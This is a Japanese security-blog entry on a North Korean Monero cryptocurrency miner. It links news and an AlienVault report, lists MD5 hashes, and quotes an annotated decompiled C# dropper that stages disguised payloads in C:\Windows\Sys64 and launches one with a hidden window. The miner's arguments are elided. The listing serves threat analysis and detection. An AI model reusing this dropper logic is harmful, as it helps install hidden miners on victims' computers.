【ニュース】
◆北朝鮮ハッカーの新手口、「モネロ採掘」標的に (WSJ, 2018/01/09 06:30)
http://jp.wsj.com/articles/SB11634795812220464149304583626240703581184
【公開情報】
◆A North Korean Monero Cryptocurrency Miner (Alien Vault, 2018/01/08)
https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner
【関連まとめ記事】
◆暗号資産 / 仮想通貨 (まとめ)
https://security-log.hatenablog.com/entry/Cryptographic_Assets
【インディケータ情報】
■ハッシュ情報(MD5)
6a261443299788af1467142d5f538b2c
762c3249904a8bf76802effb54426655
42344bb45f351757e8638656e12a0135
(以上は Alien Vault の情報。 引用元は https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner)
■デコンパイル情報(6a261443299788af1467142d5f538b2c)
// Decompiled listing of the sample with MD5 6a261443299788af1467142d5f538b2c, quoted
// from the AlienVault write-up linked above. The comments below are an analyst's
// reading of the visible code only. NOTE: the command line passed to
// intelservice.exe is not on this page (the blog author replaced it with the
// footnote marker "*1"), so the listing is incomplete and does not compile as shown.
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;

namespace ConsoleApp5
{
    // Token: 0x02000008 RID: 8
    // [StandardModule] together with the Microsoft.VisualBasic helper calls
    // (Conversions, Interaction, NewLateBinding, Operators) indicates the
    // original was compiled from VB.NET; the C# below is decompiler output.
    [StandardModule]
    internal sealed class Module1
    {
        // Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328
        // Installer routine. In order it: (1) builds a 6-character random suffix,
        // (2) creates C:\Windows\Sys64 and C:\SoftwaresInstall, (3) copies three
        // files shipped next to the binary into those directories under .exe
        // names, (4) writes a Desktop shortcut pointing at updater.exe through the
        // WScript.Shell COM object, (5) starts the soft<suffix>.exe copy, and
        // (6) starts intelservice.exe with a hidden window and an argument string
        // that is elided on this page. The fixed directory names, the file names
        // and Desktop\shortcut.lnk are host artifacts a defender can hunt for.
        [STAThread]
        public static void Main()
        {
            // French for "no argument". Printed unconditionally; the process
            // arguments are never examined anywhere in this method.
            Console.WriteLine("Aucun argument");
            // Letter set with D/C, N/M and V/U transposed relative to A–Z
            // (presumably a typo in the source, but it is a fingerprint of the build).
            char array = "ABDCEFGHIJKLNMOPQRSTVUWXYZ".ToCharArray();
            char array2 = "0123456789".ToCharArray();
            // System.Random, not a cryptographic source: the suffix is only used
            // to vary the dropped file name, not as a secret.
            Random random = new Random();
            string text = string.Empty;
            // Each position is a coin flip between a letter and a digit,
            // giving a 6-character suffix such as "A7K22Q" (constructed example).
            while (text.Length < 6)
            {
                if (random.Next(0, 2) == 0)
                {
                    text += Conversions.ToString(array[random.Next(0, array.Length)]);
                }
                else
                {
                    text += Conversions.ToString(array2[random.Next(0, array2.Length)]);
                }
            }
            Console.WriteLine(text);
            // Staging directories. "Sys64" is not a real Windows system folder;
            // its presence under C:\Windows is itself an indicator.
            if (!Directory.Exists("C:\\Windows\\Sys64"))
            {
                Directory.CreateDirectory("C:\\Windows\\Sys64");
            }
            if (!Directory.Exists("C:\\SoftwaresInstall"))
            {
                Directory.CreateDirectory("C:\\SoftwaresInstall");
            }
            // The payloads travel as ".dat" files in relative "licence" / "setup"
            // folders next to the installer and are renamed to .exe on copy.
            // Note the mixed "/" and "\\" separators in the source paths.
            if (!File.Exists("C:\\Windows\\Sys64\\updater.exe"))
            {
                File.Copy("licence/key.dat", "C:\\Windows\\Sys64\\updater.exe");
            }
            if (!File.Exists("C:\\Windows\\Sys64\\intelservice.exe"))
            {
                File.Copy("licence\\licence.dat", "C:\\Windows\\Sys64\\intelservice.exe");
            }
            // Unlike the two copies above this one is unconditional; File.Copy
            // without the overwrite flag throws if the destination already exists,
            // which the random suffix makes unlikely but not impossible.
            File.Copy("setup\\update.exe", "C:\\SoftwaresInstall\\soft" + text + ".exe");
            // WScript.Shell is instantiated twice; the first instance is simply
            // overwritten by the second (decompiled VB late binding).
            object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
            objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
            // WshShell.SpecialFolders("Desktop") -> current user's Desktop path.
            object objectValue2 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "SpecialFolders", new object { "Desktop" }, null, null, null));
            // Creates <Desktop>\shortcut.lnk. A .lnk on the Desktop whose target is
            // C:\Windows\Sys64\updater.exe is a detection artifact; whether it also
            // serves as a persistence mechanism depends on the user clicking it,
            // which the visible code does not arrange for.
            object objectValue3 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "CreateShortcut", new object { Operators.ConcatenateObject(objectValue2, "\\shortcut.lnk") }, null, null, null));
            NewLateBinding.LateSet(objectValue3, null, "TargetPath", new object { 
                NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", new object { "C:\\Windows\\Sys64\\updater.exe" }, null, null, null) }, null, null);
            NewLateBinding.LateSet(objectValue3, null, "WorkingDirectory", new object { NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", new object { "C:\\Windows\\Sys64" }, null, null, null) }, null, null);
            // WshShortcut.WindowStyle documents 1 (normal), 3 (maximized) and
            // 7 (minimized); 4 is outside that set — actual effect to be confirmed.
            NewLateBinding.LateSet(objectValue3, null, "WindowStyle", new object[] { 4 }, null, null);
            NewLateBinding.LateCall(objectValue3, null, "Save", new object[0], null, null, null, true);
            // First payload is launched immediately under its randomised name.
            Process.Start("C:\\SoftwaresInstall\\soft" + text + ".exe", "");
            Console.WriteLine("The number of processors on this computer is {0}.", Environment.ProcessorCount);
            int processorCount = Environment.ProcessorCount;
            Console.WriteLine(processorCount);
            // `value` and `str` are not referenced in the visible code; they are
            // presumably consumed by the elided argument string below (the core
            // count minus one and a "KJU<n>" token) — TODO confirm against the
            // original report.
            int value = checked(processorCount - 1);
            string str = "KJU" + Conversions.ToString(processorCount);
            // Second payload runs with a hidden window. "*1" is the blog's footnote
            // marker standing in for the real Arguments expression; the `?? ""`
            // suggests the original fell back to an empty string when null.
            Process.Start(new ProcessStartInfo("C:\\Windows\\Sys64\\intelservice.exe") { WindowStyle = ProcessWindowStyle.Hidden, Arguments = *1 ?? "") });
        }
    }
}
(以上は Alien Vault の情報。 引用元は https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner)